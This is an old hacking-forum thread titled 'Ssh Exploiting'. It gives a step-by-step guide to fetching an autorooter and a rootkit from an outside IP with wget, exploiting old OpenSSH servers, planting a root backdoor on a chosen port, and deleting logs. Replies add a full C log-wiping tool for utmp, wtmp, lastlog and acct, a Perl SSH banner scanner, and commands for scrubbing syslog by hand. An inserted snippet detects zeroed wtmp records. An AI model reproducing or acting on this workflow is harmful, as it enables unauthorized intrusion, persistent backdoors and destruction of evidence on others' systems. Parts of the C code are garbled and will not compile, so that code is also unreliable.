Full Version: Ssh Exploiting
jurk-off



First, we need some tools

secureCRT (https://secure.vandyke.com/vandyke-bin/download_form.cgi?PRODUCT=SecureCRT_beta)
A SSH Client to connect to an SSH box.. With this version u can SSH with a proxy

LNX r00tkit (http://81.86.153.92/dd/lnx.gz)
a rootkit, best there is i think.. Very easy to use.. Only needed in last step

X6 (http://81.86.153.92/dd/x6.tgz)
The Autorooter..

First, you gotta have a scan with vulnerable ips (or just one )
WATcH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULNERABLE
Almost always works for exploiting..

Lets say we got an IP, 0.0.0.0, and a shell..
Connect to your shell and type :
wget http://81.86.153.92/dd/x6.tgz
it downloads the autorooter to the shell..
When its done, Type :
tar xzvf x6.tgz
Then type
cd x6
When in the dir, type :
./x6 -t#
it shows u all the Exploitable SSH Versions..
Lets say we got an exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The Ip = 0.0.0.0
you type :
./x6 -t123 0.0.0.0
Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter..
Normally it starts exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..
Just let it go and it will exploit your box..
If it doesnt go to 1. ..., and it says FATAL: no its not vulnerable

Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS
*** YOU ARE IN ***
Boxname Boxhost blahblah
then type the following
cd /usr/man/man3/
and then :
mkdir ". hiden"
and then :
cd "..."
This is an hidden dir so the Sysop wont notice

Now we r going to download the Rootkit
type :
wget http://81.86.153.92/dd/lnx.gz
It will start downloading..
When done, type :
tar xzvf lnx.gz
and then:
cd lnx
Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374
It Installs the Rootkit, and Done !!
Connect to the ip with port 25374 (or the one u took)
Username = root and u gave the password urself..

now CLEANIN (for no traces):
rm -rf /var/logs/*

SSH scan TUTORIAL

USE nmap
http://www.insecure.org/nmap/nmap_download.html

syntax for SSH scanz
nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT

-O means guess remote OS
-sS tcp syn stealth
-p ports to scan (WE include ftp telnet and ssh and HTTP and secure http)
and finally the nets '194.65.*.*' it will scan from 194.65.1.1 to 194.65.254.254

have PHUnz

Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended. Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

PROTEC ur NIX

Before scanin or haxin i would recommend to change thiz vars. its very easy works on all linux versions..
just make a shell script with vi ::

#!/bin/sh
####
echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
####
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
####
echo Done
echo now use ur nmap or ur exploits and have phunz
####
w00dy
QUOTE
rm -rf /var/logs/*

That is a very bad way to clean logfiles. It is one of the fastest ways for even a semi horrible admin to realize their box has been tampered with.
GSecur
What other method might be used w00dy?
w00dy
Here's the script i used to use when i was 'testing' my OWN computers. It's been a couple years, but it should still work... USE IT FOR THE SOLE USE OF TESTING ON COMPUTERS YOU OWN ..BLAH BLAH BLAH and all that other stuff that says im not liable

I compile it and then place it in /bin

then type:

cl u <username>
cl w <username>
cl l <username> <ip/host>

and that should clear utmp, wtmp and lastlog

clean.c <-- dont leave it named that when u compile it :/

====begin copying=====

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/uio.h>
#ifndef NO_ACCT
#include <sys/acct.h>
#endif
#include <utmp.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <pwd.h>
#include <time.h>
#include <stdlib.h>

#ifdef HAVE_LASTLOG_H
#include <lastlog.h>
#endif

#ifdef HAVE_UTMPX
#include <utmpx.h>
#endif

#ifndef UTMP_FILE
#ifdef _PATH_UTMP
#define UTMP_FILE _PATH_UTMP
#else
#define UTMP_FILE "/var/adm/utmp"
#endif
#endif

#ifndef WTMP_FILE
#ifdef _PATH_WTMP
define WTMP_FILE _PATH_WTMP
#else
#define WTMP_FILE "/var/adm/wtmp"
#endif
#endif

#ifndef LASTLOG_FILE
#ifdef _PATH_LASTLOG
#define LASTLOG_FILE _PATH_LASTLOG
#else
#define LASTLOG_FILE "/var/adm/lastlog"
#endif
#endif

#ifndef ACCT_FILE
#define ACCT_FILE "/var/adm/pacct"
#endif

#ifdef HAVE_UTMPX

#ifndef UTMPX_FILE
#define UTMPX_FILE "/var/adm/utmpx"
#endif

#ifndef WTMPX_FILE
#define WTMPX_FILE "/var/adm/wtmpx"
#endif

#endif /* HAVE_UTMPX */

#define BUFFSIZE 8192


/*
* This function will copy the src file to the dst file.
*/
void
copy_file(char *src, char *dst)
{
int fd1, fd2;
int n;
char buf[BUFFSIZE];

if ( (fd1 = open(src, O_RDONLY)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s during copy.\n", src);
return;
}

if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) {
fprintf(stderr, "ERROR: Creating %s during copy.\n", dst);
return;
}

while ( (n = read(fd1, buf, BUFFSIZE)) > 0)
if (write(fd2, buf, n) != n) {
fprintf(stderr, "ERROR: Write error during copy.\n");
return;
}

if (n < 0) {
fprintf(stderr, "ERROR: Read error during copy.\n");
return;
}

close(fd1);
close(fd2);
}


/*
* UTMP editing.
*/
void
wipe_utmp(char *who, char *line)
{
int fd1;
struct utmp ut;

printf("Patching %s .... ", UTMP_FILE);
fflush(stdout);

/*
* Open the utmp file.
*/
if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE);
return;
}

/*
* Copy utmp file excluding relevent entries.
*/
while ( read(fd1, &ut, sizeof(ut)) > 0)
if ( !strncmp(ut.ut_name, who, strlen(who)) )
if (!line || (line &&
!strncmp(ut.ut_line, line, strlen(line)))) {
bzero((char *) &ut, sizeof(ut));
lseek(fd1, (int) -sizeof(ut), SEEK_CUR);
write(fd1, &ut, sizeof(ut));
}

close(fd1);

printf("Done.\n");
}

/*
* UTMPX editing if supported.
*/
#ifdef HAVE_UTMPX
void
wipe_utmpx(char *who, char *line)
{
int fd1;
struct utmpx utx;

printf("Patching %s .... ", UTMPX_FILE);
fflush(stdout);

/*
* Open the utmp file and temporary file.
*/
if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE);
return;
}

while ( (read(fd1, &utx, sizeof(utx)) ) > 0)
if ( !strncmp(utx.ut_name, who, strlen(who)) )
if (!line || (line &&
!strncmp(utx.ut_line, line, strlen(line)))) {
bzero((char *) &utx, sizeof(utx));
lseek(fd1, (int) -sizeof(utx), SEEK_CUR);
write(fd1, &utx, sizeof(utx));
}

close(fd1);

printf("Done.\n");
}
#endif


/*
* WTMP editing.
*/
void
wipe_wtmp(char *who, char *line)
{
int fd1;
struct utmp ut;

printf("Patching %s .... ", WTMP_FILE);
fflush(stdout);

/*
* Open the wtmp file and temporary file.
*/
if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE);
return;
}

/*
* Determine offset of last relevent entry.
*/
lseek(fd1, (long) -(sizeof(ut)), SEEK_END);
while ( (read (fd1, &ut, sizeof(ut))) > 0) {
if (!strncmp(ut.ut_name, who, strlen(who)))
if (!line || (line &&
!strncmp(ut.ut_line, line, strlen(line)))) {
bzero((char *) &ut, sizeof(ut));
lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR);
write(fd1, &ut, sizeof(ut));
break;
}
lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR);
}

close(fd1);

printf("Done.\n");
}


/*
* WTMPX editing if supported.
*/
#ifdef HAVE_UTMPX
void
wipe_wtmpx(char *who, char *line)
{
int fd1;
struct utmpx utx;

printf("Patching %s .... ", WTMPX_FILE);
fflush(stdout);

/*
* Open the utmp file and temporary file.
*/
if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE);
return;
}

/*
* Determine offset of last relevent entry.
*/
lseek(fd1, (long) -(sizeof(utx)), SEEK_END);
while ( (read (fd1, &utx, sizeof(utx))) > 0) {
if (!strncmp(utx.ut_name, who, strlen(who)))
if (!line || (line &&
!strncmp(utx.ut_line, line, strlen(line)))) {
bzero((char *) &utx, sizeof(utx));
lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR);
write(fd1, &utx, sizeof(utx));
break;
}
lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR);
}

close(fd1);

printf("Done.\n");
}
#endif

/*
* LASTLOG editing.
*/
void
wipe_lastlog(char *who, char *line, char *timestr, char *host)
{
int fd1;
struct lastlog ll;
struct passwd *pwd;
struct tm *tm;
char str[4];

printf("Patching %s .... ", LASTLOG_FILE);
fflush(stdout);

tm = (struct tm *) malloc( sizeof(struct tm) );

/*
* Open the lastlog file.
*/
if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE);
return;
}

if ( (pwd = getpwnam(who)) == NULL) {
fprintf(stderr, "ERROR: Can't find user in passwd.\n");
return;
}

lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0);
bzero((char *) &ll, sizeof(ll));

if (line)
strncpy(ll.ll_line, line, strlen(line));

if (timestr) {
/* YYMMddhhmm */
if (strlen(timestr) != 10) {
fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n");
return;
}

/*
* Extract Times.
*/
str[2] = 0;
str[0] = timestr[0];
str[1] = timestr[1];
tm->tm_year = atoi(str);

str[0] = timestr[2];
str[1] = timestr[3];
tm->tm_mon = atoi(str) - 1;

str[0] = timestr[4];
str[1] = timestr[5];
tm->tm_mday = atoi(str);

str[0] = timestr[6];
str[1] = timestr[7];
tm->tm_hour = atoi(str);

str[0] = timestr[8];
str[1] = timestr[9];
tm->tm_min = atoi(str);
tm->tm_sec = 0;

ll.ll_time = mktime™;
}

if (host)
strncpy(ll.ll_host, host, sizeof(ll.ll_host));


write(fd1, (char *) &ll, sizeof(ll));

close(fd1);

printf("Done.\n");
}


#ifndef NO_ACCT
/*
* ACCOUNT editing.
*/
void
wipe_acct(char *who, char *line)
{
int fd1, fd2;
struct acct ac;
char ttyn[50];
struct passwd *pwd;
struct stat sbuf;
char *tmpf;

printf("Patching %s .... ", ACCT_FILE);
fflush(stdout);

/*
* Open the acct file and temporary file.
*/
if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) {
fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE);
return;
}

/*
* Grab a unique temporary filename.
*/
tmpf = tmpnam((char *) NULL);

if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) {
fprintf(stderr, "ERROR: Opening tmp ACCT file\n");
return;
}

if ( (pwd = getpwnam(who)) == NULL) {
fprintf(stderr, "ERROR: Can't find user in passwd.\n");
return;
}

/*
* Determine tty's device number
*/
strcpy(ttyn, "/dev/");
strcat(ttyn, line);
if (stat(ttyn, &sbuf) < 0) {
fprintf(stderr, "ERROR: Determining tty device number.\n");
return;
}

while ( read(fd1, &ac, sizeof(ac)) > 0 ) {
if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) )
write(fd2, &ac, sizeof(ac));
}

close(fd1);
close(fd2);

copy_file(tmpf, ACCT_FILE);

if ( unlink(tmpf) < 0 ) {
fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n");
return;
}

printf("Done.\n");
}
#endif


void
usage()
{
printf("USAGE: wipe [ u|w|l|a ] ...options...\n");
printf("\n");
printf("UTMP editing:\n");
printf(" Erase all usernames : wipe u [username]\n");
printf(" Erase one username on tty: wipe u [username] [tty]\n");
printf("\n");
printf("WTMP editing:\n");
printf(" Erase last entry for user : wipe w [username]\n");
printf(" Erase last entry on tty : wipe w [username] [tty]\n");
printf("\n");
printf("LASTLOG editing:\n");
printf(" Blank lastlog for user : wipe l [username]\n");
printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n");
printf(" Where [time] is in the format [YYMMddhhmm]\n");
printf("\n");
#ifndef NO_ACCT
printf("ACCT editing:\n");
printf(" Erase acct entries on tty : wipe a [username] [tty]\n");
#endif
exit(1);
}

int
main(int argc, char *argv[])
{
char c;

if (argc < 3)
usage();

/*
* First character of first argument determines which file to edit.
*/
c = toupper(argv[1][0]);

/*
* UTMP editing.
*/
switch © {
/* UTMP */
case 'U' :
if (argc == 3)
wipe_utmp(argv[2], (char *) NULL);
if (argc ==4)
wipe_utmp(argv[2], argv[3]);

#ifdef HAVE_UTMPX
if (argc == 3)
wipe_utmpx(argv[2], (char *) NULL);
if (argc == 4)
wipe_utmpx(argv[2], argv[3]);
#endif

break;
/* WTMP */
case 'W' :
if (argc == 3)
wipe_wtmp(argv[2], (char *) NULL);
if (argc == 4)
wipe_wtmp(argv[2], argv[3]);

#ifdef HAVE_UTMPX
if (argc == 3)
wipe_wtmpx(argv[2], (char *) NULL);
if (argc == 4)
wipe_wtmpx(argv[2], argv[3]);
#endif

break;
/* LASTLOG */
case 'L' :
if (argc == 3)
wipe_lastlog(argv[2], (char *) NULL,
(char *) NULL, (char *) NULL);
if (argc == 4)
wipe_lastlog(argv[2], argv[3], (char *) NULL,
(char *) NULL);
if (argc == 5)
wipe_lastlog(argv[2], argv[3], argv[4],
(char *) NULL);
if (argc == 6)
wipe_lastlog(argv[2], argv[3], argv[4],
argv[5]);
break;
#ifndef NO_ACCT
/* ACCT */
case 'A' :
if (argc != 4)
usage();
wipe_acct(argv[2], argv[3]);
break;
#endif
}

return(0);
}
================ cut here ================
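
Added example, not part of the original thread and not w00dy's code: the wipe_utmp/wipe_wtmp routines above overwrite a matching record with zeros in place, so the file keeps its length and is left with all-zero records. The sketch below is a defender-side check for that artifact; the names wtmp_scan, scan_stream and write_sample are hypothetical, and the sample records are constructed. It is a heuristic: an all-zero record carries no type, timestamp or line and is worth investigating, not proof of tampering.

```c
#include <stdio.h>
#include <string.h>
#include <utmp.h>

struct wtmp_scan {
    long total;        /* complete records read */
    long zeroed;       /* records in which every byte is zero */
    long first_zeroed; /* index of the first zeroed record, -1 if none */
    long trailing;     /* stray bytes after the last complete record */
};

/* A record counts as zeroed when all sizeof(struct utmp) bytes are 0. */
static int record_is_zeroed(const struct utmp *ut)
{
    const unsigned char *p = (const unsigned char *)ut;
    size_t i;
    for (i = 0; i < sizeof(*ut); i++)
        if (p[i] != 0)
            return 0;
    return 1;
}

/* Read fixed-size records from fp until EOF and tally the zeroed ones. */
struct wtmp_scan scan_stream(FILE *fp)
{
    struct wtmp_scan r = { 0, 0, -1, 0 };
    struct utmp ut;
    size_t n;
    while ((n = fread(&ut, 1, sizeof(ut), fp)) == sizeof(ut)) {
        if (record_is_zeroed(&ut)) {
            if (r.first_zeroed < 0)
                r.first_zeroed = r.total;
            r.zeroed++;
        }
        r.total++;
    }
    r.trailing = (long)n;   /* non-zero means a truncated final record */
    return r;
}

/* Constructed sample: three login records, the second one zeroed in place. */
long write_sample(FILE *fp)
{
    struct utmp recs[3];
    int i;
    memset(recs, 0, sizeof(recs));
    for (i = 0; i < 3; i++) {
        recs[i].ut_type = USER_PROCESS;
        recs[i].ut_tv.tv_sec = 1100000000 + i * 60;
        strncpy(recs[i].ut_user, "alice", sizeof(recs[i].ut_user));
        strncpy(recs[i].ut_line, "pts/0", sizeof(recs[i].ut_line));
    }
    memset(&recs[1], 0, sizeof(recs[1]));
    return (long)fwrite(recs, sizeof(recs[0]), 3, fp);
}

int main(int argc, char *argv[])
{
    /* With no argument, scan the constructed sample instead of a file. */
    FILE *fp = (argc > 1) ? fopen(argv[1], "rb") : tmpfile();
    struct wtmp_scan r;
    if (fp == NULL) { perror("open"); return 2; }
    if (argc < 2) { write_sample(fp); rewind(fp); }
    r = scan_stream(fp);
    fclose(fp);
    printf("records=%ld zeroed=%ld first_zeroed=%ld trailing=%ld\n", r.total, r.zeroed, r.first_zeroed, r.trailing);
    return r.zeroed > 0 ? 1 : 0;
}
```

Run it against a copy of the accounting file (for example /var/log/wtmp); exit status 1 means at least one zeroed record was found.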
DJVASTVASTY2K
Bl00dy G00d Post M8's

I Like this very much thankyou "Jerk-Off" and thankyou "W00dy"

This will definitely be studied to test security blah blah blah etc.....

However don't you need a shell first in order to exploit SSH ??

I am new to SSH exploiting so please forgive me if I say something and it aint true

Also I found a SSH Scan Code

Maybe It Can Be Useful For You

Code Starts Below

#!usr/bin/perl
#
#################################################################
# #
# Digital WrapperZ - SSH Security Shell Scanner #
# Digital Wrapperz are: m4st3r_syst3m :: Dropper :: c0d3r_b0y #
# For educational and violative purposes only! #
# g00d h4ck1n'!! #
# #
#################################################################
#

use IO::Socket::INET;

print"\n\n\n\n\n\n\n dddddd tttt";
print"\n ddddddd gg tttttttt LLLL";
print"\n dd dd ii gg gg ii ttt aaaaaa LLL";
print"\n dd dd iii gg gg iii ttt aa aa LLL";
print"\n dd dd iii gg iii tt aa aa LLL";
print"\n dd dd iii gg gg iii tt aaaaaaa LL";
print"\n ddddddd ii gg gg ii tt aaa aaa LLLLL";
print"\n dddddd ii gggg ii t aa aa LLLLLLLL";
print"\n\n - _ - _ - _ - _ - _ -";
print"\n __-+-__-+-__-+-__-+-...WrapperZ...-+-__-+-__-+-__-+-__";
print"\n - _ - _ - _ - _ - _ -";
print"\n\n\n\n\n\n";
sleep 2;
print"\n\n\n\n -- Security Shell (SSH) Scanner --";
print"\n\n coded by:";
print"\n c0d3r_b0y of Digital WrapperZ";
print"\n\n\n\n\n\n\n\n\n\n\n\n------------------------------------------------------------------------";
print "\nNome do arquivo de lista: ";
chop (my $lista=<stdin>);
print "\nNome do arquivo de resultados: ";
chop (my $resul=<stdin>);
print"\n";
$porta_num = 22;
my @host;
open(LISTA,"$lista") or die "\nErro ao abrir $lista: Arquivo inexistente ou corrompido! $!";
print "\n\n\n [SCAN!!]\n";
while (<LISTA>)
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(LISTA);
$a = 0;
while ($a < $b)
{
print "\nEscaneando $host[$a]... ";
chomp $host[$a];
my $soquete = IO::Socket::INET -> new(
PeerAddr=>"$host[$a]",
PeerPort=>"$porta_num",
Proto=>"tcp",
);
select((select($soquete), $| = 1)[0]);
print $soquete "\r\n\r\n";
@resposta = <$soquete>;
shutdown($soquete,1);
if(@resposta[0] =~/SSH/)
{
print "[OK!]";
open(RES,">>$resul");
print RES "$host[$a] -=> @resposta[0]";
close RES;
}
else
{
print "[Sem Security Shell!]";
}
$a++;
}
print "\n\n\n------------------------------------------------";
print "\n Salvando resultados em $resul .";
sleep 1;
print " .";
sleep 1;
print " . [Pronto!]";
print "\n Escaneamento completo!\n Cheque em $resul para ver a lista de sites rodando SSH.";
print "\n\n\n";
sleep 1;
print "--------------------------------------------------------------\n";
print " Digital WrapperZ\n";
print " - - - - - - - - - - - - -\n";
print " digitalwrapperz\@email.com\n";
print "--------------------------------------------------------------\n\n";

Code Ends Here

Best Regards

Adam

Vast Gsm Team

Da Sick Crew
ripper2k3
can someone compile the ssh scanner from DJVASTVASTY2K please
fandango
#!usr/bin/perl .. means its a perl script and theres no need to compile it. Get yourself a perl interpreter and run the script with it...
creep01
If you are careful you don't need to play with the logs. Woody's method is better than erasing /var/log/* but still is not the answer.

A way not to leave a trace in the computers wtmp logs is by killing your shell, instead of leaving the system via "exit" or "logout" command. just find the pid of your shell and kill -9 pid. This won't leave a trace in the system logs.

Though daemons like ssh/ftp/telnet whatever you have used to enter the system, will write a line or some lines of log to syslog. That is something that you have to clean with your hand, manually, e.g. cat /var/log/messages | grep -v myip > /tmp/log; mv /tmp/log /var/log/messages

etc etc more on that you have to search for remote logging and other traps that could exist in the system.

creep01
GhostCow
jurk off great post indeed but yur web server is down

plus: woody check this out:
woody.c: In function `wipe_lastlog':
woody.c:341: warning: assignment makes integer from pointer without a cast
woody.c:341: parse error before character 0231
woody.c: In function `main':
woody.c:467: parse error before character 0251
woody.c:482: break statement not within loop or switch
woody.c:484: case label not within a switch statement
woody.c:497: break statement not within loop or switch
woody.c:499: case label not within a switch statement
woody.c:512: break statement not within loop or switch
woody.c:515: case label not within a switch statement
woody.c:519: break statement not within loop or switch
woody.c: At top level:
woody.c:523: parse error before `return'
GhostCow
hey all the links are broken... please renew/restore them or upload the files to your post...
thanks
agathos
i found a nice log wiper called die_putze it can be found on packetstorm security
UNDERTAKER
can anyone fix the links/upload the files?
10x m8s
it will be great if someone will make a good log cleaner for linux...
shaun2k2
I agree, simply pulling an 'rm -rf /var/logs/*' is a sure tell-tale sign to the administrator, but if you've defaced the website (as a statement to the admin), then hey; you might as well just delete the logs.

QUOTE

  can anyone fix the links/upload the files?
10x m8s
it will be great if someone will make a good log cleaner for linux...

There's tons of log cleaners for UNIX-like OSes. Search for "index of" zap2.c on google.

QUOTE

If you are careful you don't need to play with the logs. Woody's method is better than erasing /var/log/* but still is not the answer.

A way not to leave a trace in the computers wtmp logs is by killing your shell, instead of leaving the system via "exit" or "logout" command. just find the pid of your shell and kill -9 pid. This won't leave a trace in the system logs.

Though daemons like ssh/ftp/telnet whatever you have used to enter the system, will write a line or some lines of log to syslog. That is something that you have to clean with your hand, manually, e.g. cat /var/log/messages | grep -v myip > /tmp/log; mv /tmp/log /var/log/messages

etc etc more on that you have to search for remote logging and other traps that could exist in the system.

creep01

I agree, but few sysadmins actually check their logs. They might tail them every so often...


Thank you for your time.
Shaun.
GhostCow
links still down... sorry to be a buggah but it looks really tempting... can you at least say which exploits are those?


edit: tried "index of" x6.tgz and i found it thanks for the tip (lol everyone posted that stuff but i forgot about it already)
linuxwolf
good work good work, =)
soon you'll have your very own roots.. yey..
GhostCow
wooooopy!!! (even though ive been using the openssl exploit for a while now)
SmokeX
where can i find the source code of x6?
or at least any1 here knows on what vul it working?
woutiir
aint this exploit not really old? Sure it should be private and all just like X2 but damn this is just soooo outdated? Or am i wrong.. I would put some effort in the do_brk(); vulnerable. Might be way more useful


Tho, nice to share us

Gr. woutiir
-= mAc =-
QUOTE
nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT -O


Invalid character in host specification.
QUITTING!
predx
hscan can do banner scanning
Losti
Can u tell me whats wrong, if i got

No Crash, might have worked
error on read, continuing


when it tries to Attach with different rets =?

Somethin wrong with my Linux or the target have FW or something like that ?
MUCH THX 4 HELP !!
Xion
thank you for exploit tongue.gif
Axl
nice tutorial but please give the credit to the writer !

"Droidsect" from israel !

lol -israel rullleezz the scene !
teest
have anyone good offset, I tried some few days ago and no one work :/